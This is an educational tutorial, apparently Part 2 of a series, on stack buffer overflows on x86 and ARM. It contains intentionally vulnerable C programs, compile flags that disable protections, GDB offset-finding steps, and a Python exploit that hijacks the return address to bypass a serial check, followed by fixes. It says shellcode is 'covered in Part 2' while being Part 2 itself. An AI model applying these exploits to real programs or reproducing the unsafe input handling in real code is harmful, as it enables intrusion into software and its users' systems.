Introduction to exploit development - Part 2: Stack overflows

Nov 1, 2025

#security #exploit-development #systems #x86 #memory #linux

Overview

In Part 1, we configured lab environments for exploit development on both x86 and ARM. Next we'll turn to understanding the most basic vulnerability (which, surprisingly, is still the cause of many vulnerabilities to this day): the stack-based buffer overflow.

We'll look at understanding memory layout, stack frames, and how buffer overflows enable control flow hijacking. We will also examine two deliberately vulnerable programs to understand how exceeding buffer boundaries corrupts adjacent memory, ultimately allowing us to redirect program execution.

Memory layout of a process

When a program executes, the operating system allocates several distinct memory regions, each serving a specific purpose. Understanding this layout is critical for exploit development, as different vulnerabilities target different regions.

A typical Linux process memory layout (from low to high addresses):

.text segment: Contains the executable machine instructions (program code). This region is typically read-only to prevent code modification at runtime.
.data segment: Contains initialized global and static variables. These values are set at compile time and persist for the program's lifetime.
.bss segment: Contains uninitialized global and static variables. The name stands for "Block Started by Symbol" (historical reasons). These are zero-initialized at program start.
Heap: Dynamically allocated memory region that grows upward (toward higher addresses). Managed via malloc(), calloc(), realloc(), and free() in C.
Stack: Automatically managed memory for function call frames, local variables, and return addresses. Grows downward (toward lower addresses) on x86 and ARM architectures.

The stack and heap grow toward each other. If they collide, the program typically crashes with a stack overflow (not to be confused with stack buffer overflow, which we discuss below).

  block-beta
    columns 5
    ADDR_G["0xbfffffff"]:1
    G["Kernel space (top of user memory)"]:4
    EMPTY1[" "]:1
    F["Stack (grows downward ↓) - function calls"]:4
    EMPTY2[" "]:1
    E["(unused memory)"]:4
    EMPTY3[" "]:1
    D["Heap (grows upward ↑) - malloc/free"]:4
    EMPTY4[" "]:1
    C[".bss segment - uninitialized globals"]:4
    ADDR_B["0x08049000"]:1
    B[".data segment - initialized globals"]:4
    ADDR_A["0x08048000"]:1
    A[".text segment - executable code, read-only"]:4

    style G fill:#fff,stroke:#8B7355,stroke-width:2px
    style F fill:#fff,stroke:#6B8E23,stroke-width:2px
    style E fill:#fff,stroke:#A9A9A9,stroke-width:2px
    style D fill:#fff,stroke:#B8860B,stroke-width:2px
    style C fill:#fff,stroke:#708090,stroke-width:2px
    style B fill:#fff,stroke:#4682B4,stroke-width:2px
    style A fill:#fff,stroke:#5F9EA0,stroke-width:2px
    style ADDR_G fill:none,stroke:none
    style ADDR_B fill:none,stroke:none
    style ADDR_A fill:none,stroke:none
    style EMPTY1 fill:none,stroke:none
    style EMPTY2 fill:none,stroke:none
    style EMPTY3 fill:none,stroke:none
    style EMPTY4 fill:none,stroke:none

The diagram above illustrates this layout with typical x86 32-bit addresses. Note that modern systems with ASLR randomize most of these addresses on each execution, but we've disabled ASLR for learning purposes.

The call stack and stack frames

The stack is a Last-In-First-Out (LIFO) data structure used to manage function calls. Each function invocation creates a stack frame (also called an activation record) containing:

Function arguments: Parameters passed to the function
Return address: Memory address to return to after function completes
Saved frame pointer: Previous stack frame's base pointer (allows stack unwinding)
Local variables: Function's automatic variables

On x86, two registers manage the stack:

ESP (Stack Pointer): Points to the top of the stack (lowest address in current frame)
EBP (Base/Frame Pointer): Points to the base of the current stack frame (used as a reference point for accessing local variables and parameters)

On ARM, equivalent registers are:

SP (Stack Pointer): Same purpose as ESP on x86
FP (Frame Pointer): Same purpose as EBP on x86 (though modern ARM code often omits frame pointers for optimization)
LR (Link Register): Stores the return address instead of pushing it to the stack initially

Function prologue and epilogue

When a function is called, the prologue sets up the stack frame:

; x86 function prologue
push ebp           ; Save old frame pointer
mov ebp, esp       ; Establish new frame pointer
sub esp, N         ; Allocate space for local variables

When the function returns, the epilogue tears down the frame:

; x86 function epilogue
mov esp, ebp       ; Restore stack pointer (or: leave instruction)
pop ebp            ; Restore old frame pointer
ret                ; Pop return address into EIP and jump

The ret instruction is critical for exploitation. It pops a value from the stack into the instruction pointer (EIP on x86, PC on ARM), transferring control to that address. If we can overwrite the saved return address on the stack, we can redirect execution anywhere in memory.

Buffer overflow mechanics

A buffer overflow occurs when data written to a buffer exceeds its allocated size, overwriting adjacent memory. In C, functions like gets(), strcpy(), and scanf() perform no bounds checking, making them dangerous when handling untrusted input.

Consider a simple vulnerable function:

void vulnerable_function(char *input) {
    char buffer[30];
    gets(buffer);  // No bounds checking!
    printf("%s\n", buffer);
}

The buffer array is allocated on the stack with space for 30 bytes. If user input exceeds 30 bytes, the excess data overwrites memory beyond the buffer. On the stack, this means overwriting:

The saved frame pointer (EBP)
The saved return address
Potentially other local variables or function arguments from calling functions

By carefully crafting input, an attacker can overwrite the saved return address with a pointer to malicious code (shellcode), redirecting execution when the function returns.

Exploiting overflow.c

To understand buffer overflows concretely, we examine a vulnerable program and exploit it step by step.

overflow.c

#include <stdio.h>

void return_input (void)
{
   char array[30];

   gets (array);
   printf("%s\n", array);
}

int main(void)
{
   return_input();
   return 0;
}

Compile with security mitigations disabled (as configured in Part 1):

# x86
gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 \
    -no-pie -ggdb overflow.c -o overflow

# ARM
gcc -fno-stack-protector -z execstack -no-pie -ggdb overflow.c -o overflow

Finding the overflow offset

We use GDB to determine exactly how many bytes are needed to overwrite the return address. First, disassemble the return_input function:

gdb -q ./overflow
(gdb) disassemble return_input

The disassembly reveals:

The call to gets() where user input is read
The ret instruction where the function returns using the saved return address

Set breakpoints at the gets() call and at the ret instruction:

(gdb) break *return_input+<offset_of_gets>
(gdb) break *return_input+<offset_of_ret>
(gdb) run

At the first breakpoint (before gets()), examine the stack:

(gdb) x/20x $esp

The saved return address should be visible on the stack. By examining the disassembly of main, we can verify what address the function should return to normally (let's say 0x08048465).

Now continue to allow gets() to read input. Provide a pattern that allows us to identify the offset:

AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC DDDDDDDDDD

After entering this input, continue to the second breakpoint (at ret). Examine the stack again:

(gdb) x/20x $esp
(gdb) info registers

If the input was long enough, you'll see the saved return address has been overwritten with our pattern (e.g., 0x44444444 if we used 'D' characters). By counting characters, we determine the exact offset.

In this case, 34 bytes of padding are needed before the 4-byte return address is overwritten.

Redirecting execution

To prove we control the instruction pointer, we can overwrite the return address with the address of return_input itself, causing the function to be called twice.

From the GDB disassembly, suppose return_input is located at 0x0804845f. We construct our payload:

payload = "A" * 34 + "\x5f\x84\x04\x08"

Note the address is in little-endian format (least significant byte first), as x86 is a little-endian architecture.

Automating exploitation with Python

Manual exploitation via GDB is not straightforward and tedious, so, let's instead automate the process with a simple Python script:

exploit.py

#!/usr/bin/env python3
from subprocess import run, PIPE

def exploit(program_path: str, padding_length: int, shellcode: bytes) -> str:
    """
    Executes the target program and pipes a payload into STDIN.

    Args:
        program_path: Path to the program to execute/exploit
        padding_length: Number of padding bytes before shellcode
        shellcode: The address or code to execute

    Returns:
        Decoded stdout from the target program
    """
    payload = (b'A' * padding_length) + shellcode

    # Use stdbuf to disable C stdio buffering (prevents output loss on crash)
    result = run(['stdbuf', '-o0', program_path],
                 input=payload, stdout=PIPE, stderr=PIPE, timeout=2)

    return result.stdout.decode('utf-8', errors='replace')

if __name__ == "__main__":
    shellcode = (0x0804845f).to_bytes(4, byteorder='little')  # Address of return_input
    padding_length = 34

    print("\noverflow output:")
    print(exploit('./overflow', padding_length, shellcode))

Running this script redirects execution to return_input a second time, demonstrating control over the instruction pointer.

Architecture-specific offsets

The padding length of 34 bytes demonstrated above is specific to x86 architecture. ARM has different stack frame layouts and calling conventions due to its RISC design and use of the link register (LR). You'll need to determine the correct offset for your target architecture.

Finding the offset on ARM:

Use GDB with a unique pattern to identify where the return address is overwritten:

gdb -q ./overflow
(gdb) run < <(python3 -c 'print("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL")')
(gdb) info registers pc

The PC (program counter) register will contain part of your pattern. For example, if pc = 0x4a4a4a4a (ASCII "JJJJ"), count the position of "JJJJ" in your pattern to determine the offset. In this case, "JJJJ" appears at byte 36, so 36 bytes of padding are needed on ARM.

Next, find the runtime address of return_input:

(gdb) break return_input
(gdb) run
# Enter any input to hit the breakpoint
(gdb) print return_input

This shows the actual runtime address where the function is loaded in memory. The disassemble output shows relative offsets, not absolute addresses. On ARM, you might see something like {void (void)} 0x40052c <return_input>, indicating the function is at address 0x40052c at runtime.

ARM Thumb mode consideration:

ARM processors support two instruction set modes: ARM mode (32-bit instructions) and Thumb mode (16-bit instructions). Modern ARM code is typically compiled in Thumb mode for better code density. When jumping to a Thumb mode function, you must set the least significant bit (LSB) of the address to 1. This tells the processor to execute in Thumb mode. If you don't set the LSB, the processor will try to execute Thumb instructions as ARM instructions, resulting in an SIGILL (Illegal Instruction) error.

To check if your function uses Thumb mode, look at the GDB disassembly - if instructions are 2-byte aligned (e.g., 0x52c, 0x52e, 0x530), it's Thumb mode.

Use this address in your exploit with the LSB set:

if __name__ == "__main__":
    # Set LSB to 1 for Thumb mode (0x10424 | 1 = 0x10425)
    shellcode = (0x10424 | 1).to_bytes(4, byteorder='little')
    padding_length = 36  # ARM offset

    print("\noverflow output:")
    print(exploit('./overflow', padding_length, shellcode))

Note architectural differences between x86 and ARM exploitation:

Register names: ARM uses PC (program counter) instead of EIP, and LR (link register) for return addresses
Stack layout: ARM's push {r7, lr} prologue differs from x86's push ebp; mov ebp, esp
Offsets: Due to different calling conventions, buffer overflow offsets vary between architectures

Exploiting serial.c

This second example presents a more fun/realistic scenario: bypassing authentication logic. The code is adapted from The Shellcoder's Handbook, 2nd Edition by Chris Anley et al.

serial.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int valid_serial(char *psz) {
   size_t len = strlen(psz);
   unsigned total = 0;
   size_t i;

   if(len < 10)
      return 0;

   for(i = 0; i < len; i++) {
      if((psz[i] < '0') || (psz[i] > 'z'))
         return 0;

      total += psz[i];
   }

   if(total % 853 == 83)
      return 1;

   return 0;
}

int validate_serial() {
   char serial[24];

   fscanf(stdin, "%s", serial);

   if(valid_serial(serial))
      return 1;
   else
      return 0;
}

int do_valid_stuff() {
   printf("The serial number is valid!\n");
   // do serial-restricted, valid stuff here.
   exit(0);
}

int do_invalid_stuff() {
   printf("Invalid serial number!\nExiting\n");
   exit(1);
}

int main(int argc, char *argv[]) {
   if(validate_serial())
      do_valid_stuff();
   else
      do_invalid_stuff();

   return 0;
}

This program implements a serial number validation scheme. The valid_serial() function checks whether a provided string meets specific criteria:

Length must be at least 10 characters
All characters must be between '0' (ASCII 48) and 'z' (ASCII 122)
The sum of all character ASCII values modulo 853 must equal 83

Finding a legitimate serial satisfying these constraints is technically possible but nontrivial. However, validate_serial() uses fscanf() with %s, which performs no bounds checking on the 24-byte serial buffer...so, buffer overflow time!

Bypassing validation

Instead of finding a valid serial number, we overflow the buffer to overwrite the return address of validate_serial(), redirecting execution directly to do_valid_stuff().

Using GDB, find the address of do_valid_stuff(). We then need to determine the correct padding length to reach the saved return address.

Since we don't know the exact offset, we can brute force it programmatically by making some modifications to the exploit.py program we created earlier:

shellcode = (0x0804863c).to_bytes(4, byteorder='little')  # Address of do_valid_stuff()
# shellcode = (0x1059c | 1).to_bytes(4, byteorder='little') # For ARM

for padding_len in range(24, 35):
    output = exploit('./serial', padding_len, shellcode)
    if "valid" in output:
        print(f"Correct padding length: {padding_len}")
        print(f"Output:\n{output}")
        break

This loop tries padding lengths from 24 to 34 bytes. When the correct offset is found (typically around 28 bytes for this program), the overflow redirects execution to do_valid_stuff(), bypassing the serial validation entirely.

Understanding the implications

These simple examples illustrate a fundamental security principle: memory safety violations enable arbitrary code execution. By corrupting the saved return address, we can redirect program flow to:

Existing functions (as demonstrated above)
Shellcode injected into memory (covered in Part 2)
ROP gadgets for advanced exploitation (also covered in Part 2)

The vulnerability stems from:

Unsafe functions that don't validate input bounds (gets(), strcpy(), scanf(), fscanf())
Languages (like C) that don't enforce memory safety by default
The stack storing both data (local variables) and control flow information (return addresses) adjacently

Modern systems implement multiple mitigations against these attacks (ASLR, stack canaries, NX bit, DEP), but understanding the fundamental mechanics is very relevant to both offensive and defensive security work (and for a general understanding of how code execution works!).

Fixing the vulnerabilities

Fixing overflow.c

Replace gets() with the bounds-checked fgets():

void return_input(void) {
    char array[30];
    fgets(array, sizeof(array), stdin);  // Bounds-checked
    printf("%s\n", array);
}

The fgets() function requires the buffer size as a parameter, preventing overflows.

Fixing serial.c

Replace fscanf() with fgets(), but handle the trailing newline that fgets() includes:

int validate_serial() {
    char serial[24];
    fgets(serial, sizeof(serial), stdin);
    serial[strcspn(serial, "\n")] = '\0';  // Remove newline

    if(valid_serial(serial))
        return 1;
    else
        return 0;
}

The strcspn() function finds the newline character and replaces it with a null terminator, ensuring valid_serial() receives the expected format.

Next steps

We now understand how buffer overflows corrupt the stack and enable control flow hijacking. In Part 3, we explore how to leverage this control by injecting and executing arbitrary machine code (shellcode) on both x86 and ARM architectures.

We will learn to:

Write position-independent shellcode in assembly
Avoid null bytes that terminate string functions
Use NOP sleds for reliable exploitation
Apply Return-Oriented Programming (ROP) when the stack is non-executable
Compare exploitation techniques across x86 and ARM architectures

References

The Shellcoder's Handbook: Discovering and Exploiting Security Holes - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
Smashing The Stack For Fun And Profit - Aleph One (Phrack Magazine)
Hacking: The Art of Exploitation - Jon Erickson
Python subprocess documentation
Removing trailing newline from fgets() input - Stack Overflow